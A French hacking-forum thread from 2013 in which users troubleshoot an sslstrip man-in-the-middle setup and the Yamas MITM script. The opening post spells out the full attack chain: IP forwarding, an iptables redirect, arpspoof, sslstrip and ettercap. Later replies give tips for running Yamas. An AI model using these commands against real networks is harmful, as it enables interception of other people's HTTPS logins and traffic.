Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 13-02-2013 14:29:52

Anthonyy59
Membre V.I.P.

Port sslstrip

Bonjour à tous, je me lance dans le sslstrip, donc je rentre les "formules":

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

arpspoof -i wlan0 iprouteur (ou arpspoof -i wlan0 -t (target) (host))

python sslstrip.py -k -l 8080

ettercap -i wlan0 -T -q

Tout est en place, mais quand je lance mon autre ordinateur j'ai ça:

sslstrip.png

J'ai essayé sur le port 10000, 15000, 8080, 7777.
Mais je ne sais pas vraiment à quoi ils correspondent. Je voudrai savoir si un port pourrait être efficasse.

Merci d'avance

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 13-02-2013 21:22:22

Furyo
Membre Irremplaçable
Site Web

Re : Port sslstrip

Salut wink

Je t'ai déjà donné une piste accessible et fonctionnant : ICI

Furyo a écrit :

Salut wink

Pourquoi ne pas utiliser Xplico ?

Tu veux absolument filtrer le SSL ?

Pour une attaque MITM, j'utiliserai le script Yamas dans ce cas wink

Le site est ici : http://comax.fr/yamas.php

Essaye wink

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#3 13-02-2013 21:38:10

Anthonyy59
Membre V.I.P.

Ah oui j'y avais pas pensé, mais quand je tape "yamas" dans BT5 il ne le trouve pas. Tu pourrai me dire où il se trouve?

Edit: J'ai ouvert le fichier .sh et je l'ai copié dans un shell, ça a l'air de chercher, on verra si ça l'installe

Dernière modification par Anthonyy59 (13-02-2013 21:41:43)

#4 13-02-2013 21:53:17

Furyo
Membre Irremplaçable
Site Web

Anthonyy59 a écrit :

Ah oui j'y avais pas pensé, mais quand je tape "yamas" dans BT5 il ne le trouve pas. Tu pourrai me dire où il se trouve?

Edit: J'ai ouvert le fichier .sh et je l'ai copié dans un shell, ça a l'air de chercher, on verra si ça l'installe

Tu cliques droit sur le script et tu choisis 'Propriétés' puis tu selectionnes l'onglet 'Permissions' et tu coches la case 'Authoriser l'execution du fichier comme un programme'

Ensuite tu fermes et tu cliques dessus...

Allez, tu vas y arriver wink

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#5 13-02-2013 21:59:04

Anthonyy59
Membre V.I.P.

J'ai réussi ! Merci à toi Furyo, je te tiendrai au courant quant à son utilisation.

#6 13-02-2013 22:02:03

Furyo
Membre Irremplaçable
Site Web

Anthonyy59 a écrit :

J'ai réussi ! Merci à toi Furyo, je te tiendrai au courant quant à son utilisation.

Bah, de rien wink

J'espère que tu saurras nous donner tes impressions wink

PS: tu verras que selon le naviguateur employé, tu as des différences wink

387003.jpg

#7 13-02-2013 22:05:52

Anthonyy59
Membre V.I.P.

Tu avais raison, il est vraiment simple d'utilisation ! Et il est rapide a mettre en place, par contre j'ai toujours la meme page qui s'affiche sur mon ordi (l'impression écran que j'ai mi au départ), c'est sans doute le navigateur qui empêche d'accèder au site non?

#8 13-02-2013 22:09:20

Furyo
Membre Irremplaçable
Site Web

Vide le cache de ton naviguateur ou change de naviguateur wink

387003.jpg

#9 13-02-2013 22:17:07

Anthonyy59
Membre V.I.P.

Je l'ai vidé mais le problème persiste, chrome est peut-être sécurisé, je te tiens au courant avec un autre navigateur wink

EDIT: Autant pour moi, il est très efficace, il fonctionne parfaitement, un grand merci a toi Furyo !

Dernière modification par Anthonyy59 (13-02-2013 22:24:28)

#10 28-02-2013 12:19:48

comaX
Nouveau membre

Salut les gars, j'ai vu que vous parliez de Yamas, donc j'me suis dit que j'allais m'inscrire pour fournir un peu de support si besoin est. Content de voir que ça vous plaît !

#11 28-02-2013 12:23:12

Furyo
Membre Irremplaçable
Site Web

comaX a écrit :

Salut les gars, j'ai vu que vous parliez de Yamas, donc j'me suis dit que j'allais m'inscrire pour fournir un peu de support si besoin est. Content de voir que ça vous plaît !

Bienvenu comaX wink

C'est toi qui t'est amusé à faire, Yamas?

387003.jpg

#12 28-02-2013 17:19:35

Anthonyy59
Membre V.I.P.

Si c'est toi qui a crée yamas, félicitation, personnellement j'adore, il est super simple d'utilisation !

#13 01-03-2013 04:02:41

comaX
Nouveau membre

C'est en effet bien moi qui me suis "amusé"* à faire Yamas. Je suis très honnêtement ravi qu'une communauté francophone l'apprécie car depuis bientôt deux ans il me semble, je n'en ai pas souvenir.
En guise de "preuve" de mon identité, je vous dirais que j'ai trouvé cette page grâce à Google Analytics.
Ca fait bien des années que je connais ce forum, mais ne m'y étais pas inscris, faute d'intérêt puisque je m'étais arrêté au côté "crack wifi" que je maîtrise déjà.

*Je mets "amusé" entre guillemets parce que c'était autant de plaisir en amphi plutôt que d'écouter mon cours, que de souffrance et des nuits blanches à coder le bon "parser" pour afficher les résultats.

PS : Pour être tout à fait honnête, je n'ai pas fais attention s'il y avait une section présentation. Si tel était le cas, dites le moi simplement, et je le ferai.

#14 01-03-2013 09:46:19

Anthonyy59
Membre V.I.P.

Tu peux aller te présenter dans la section "présentation des membres"

Je ne m'y connais pas trop en création de logiciel mais j'imagine que ça n'a pas été facile !

#15 01-03-2013 10:21:59

Furyo
Membre Irremplaçable
Site Web

Salut comaX wink

J'ai pu apprécier ton travail, tres bien fait d'ailleurs wink

J'ai decouvert Yamas sur une release de test intégré sur une production de Wifislax. Apres de nombreux tests, j'ai pu apprécié l efficacité et la pertinence.

Pour cela, je te souhaite la bienvenue sur le forum et j espere que tu seras nous dire si prochainement yamas sera mis a jour ou pas.

En attendant, bonne naviguation wink

Ps : si tu vas faire un tour sur la communautée Xiaopan.co, tu verras que Yamas est demandé egalement sur la future release wink

387003.jpg

#16 01-03-2013 12:10:46

comaX
Nouveau membre

Alors, niveau mise à jour, il y en a de prévues, de deux sortes :
- mise à jour de Yamas, avec notamment l'ajout de filtres ettercap pour modifier le trafique "on-the-fly".
- nouvelle version de Yamas (je pense l'appeler "yamas-pwn"), orientée plus agression, moins apprentissage. Ce sera Yamas, avec moins de blabla, moins de configuration. Le but c'est d'aller direct dans le vif. J'hésite encore ceci-dit, pour la simple raison que j'ai la farouche impression que beaucoup n'utilisent pas Yamas pour les bonnes raisons, malheureusement.

Le problème de la lenteur des mises à jour, c'est que j'ai une vie qui me prend beaucoup de temps entre les cours, le taff pour les cours, le taff pour manger, et les sorties avec les potes... Typiquement, ca sera mis à jour pendant les vacances, quand je peux réellement glander à mort.

Sinon, je n'avais aucune idée que Yamas était inclu dans des distribs, c'est assez incroyable !

#17 01-03-2013 12:29:29

Furyo
Membre Irremplaçable
Site Web

comaX a écrit :

Alors, niveau mise à jour, il y en a de prévues, de deux sortes :
- mise à jour de Yamas, avec notamment l'ajout de filtres ettercap pour modifier le trafique "on-the-fly".
- nouvelle version de Yamas (je pense l'appeler "yamas-pwn"), orientée plus agression, moins apprentissage. Ce sera Yamas, avec moins de blabla, moins de configuration. Le but c'est d'aller direct dans le vif. J'hésite encore ceci-dit, pour la simple raison que j'ai la farouche impression que beaucoup n'utilisent pas Yamas pour les bonnes raisons, malheureusement.

Le problème de la lenteur des mises à jour, c'est que j'ai une vie qui me prend beaucoup de temps entre les cours, le taff pour les cours, le taff pour manger, et les sorties avec les potes... Typiquement, ca sera mis à jour pendant les vacances, quand je peux réellement glander à mort.

Sinon, je n'avais aucune idée que Yamas était inclu dans des distribs, c'est assez incroyable !

Merci pour tes reponses et ton eclaircissement wink

Pour ton sentiment, je suis d'accord sur l'utilisation qui pourrait être faite de cet outil, ceci etant pour du pentesting et montrer (ou demontrer) les failles de securitée, je le trouve excellent wink

Bon courage donc pour tes etudes et l'eventualité de tes projets futurs wink

387003.jpg

#18 08-05-2013 17:29:49

alganx
Nouveau membre

Bonjour à tous voilà j'ai besoin de votre aide j'essaye de faire un MITM + ettercap le problème étant que j'ai utiliser plusieurs méthode pour réussir mais aucun ne fonctionne arrivé à la fin lorsque par ex j'essaye d'intercepter des données le navigateur m'indique "impossible d'afficher la page" j'ai même essayer avec "yamas" tout ce passe bien mais au lancement de yamas ca me met

"chmod: cannot access '/usr/share/ssltrip/ssltrip.py no such file directory"

mais je peux encore contiuer jusqu'à la fin ensuite 2 fenêtre noir s'ouvre comme sur la photo et à ce moment la plus aucun PC de mon réseau n'a internet....

mini_535656Capture.jpg

Annonce